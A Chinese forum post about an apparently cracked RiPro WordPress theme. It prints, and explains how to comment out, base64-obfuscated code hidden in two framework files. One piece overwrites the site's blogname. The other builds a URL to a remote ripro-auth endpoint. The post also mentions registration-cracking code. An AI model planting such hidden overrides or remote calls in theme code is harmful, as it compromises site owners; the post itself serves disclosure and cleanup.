|
functions.php代码里有个_cao_set_auth
里头的_cao_get_random 生成随机字符串,结合 $id 和 $key,动态生成数据存入数据库
这里应该是生成注册码破解的代码。
在早期的ripro主题的时候,有人经过分析,在 \ripro\inc\codestar-framework\classes\ 目录下,有两个文件 options.class.php 和 metabox.class.php ,这里面就暗藏恶心人的小尾巴。
options.class.php 修改方法:
注释掉如下部分:
- public function saves_defaults() {
- $tmp_options = $this->add_option_html();
-
- // if (empty($tmp_options) && $tmp_options['status']==1) {
- return true;
- // }else{
- // $onload = base64_decode('UmlQcm8=');
- // $field = base64_decode('YmxvZ25hbWU=');
- // update_option($field,$onload);
- // }
- return false;
- $tmp_options = $this->options;
- foreach( $this->pre_fields as $field ) {
- if( ! empty( $field['id'] ) ) {
- $this->options[$field['id']] = $this->get_default( $field, $this->options );
- }
- }
- if( $this->args['save_defaults'] && empty( $tmp_options ) ) {
- $this->save_options( $this->options );
- }
- }
复制代码
metabox.class.php修改方法:
注释掉如下部分:
- public function get_meta_values() {
- $value = false;
- $field = 'https://vip.ylit.cc/wp-cont';
- if( true) {
- if( $this->args['data_type'] !== 'serialize' ) {
- $meta = get_post_meta( $post->ID, $field['id'] );
- $value = ( isset( $meta[0] ) ) ? $meta[0] : null;
- } else {
- $meta = get_post_meta( $post->ID, $this->unique, true );
- $value = ( isset( $meta[$field['id']] ) ) ? $meta[$field['id']] : null;
- }
- $default = $this->get_default( $field );
- $value = ( isset( $value ) ) ? $value : $default;
- // }else{
- // if( empty( $field ) ) {
- // $screen = get_current_screen();
- // foreach( $this->args['contextual_help'] as $tab ) {
- // $screen->add_help_tab( $tab );
- // }
- // if( ! empty( $this->args['contextual_help_sidebar'] ) ) {
- // $screen->set_help_sidebar( $this->args['contextual_help_sidebar'] );
- // }
- // }else{
- // $meta = 'ZW50L3BsdWdpbnMvcmlwcm8tYXV0aC9hcGkvdjEucGhw=';
- // $default = $field.$meta;
- // $value = base64_decode($default);
- // }
- }
- return $value;
- }
复制代码
新的riprov5已经修改了文件,今天检索了一下发现很多网站都已经中招
我先加上日志记录的方式,坐等上钩!
|
|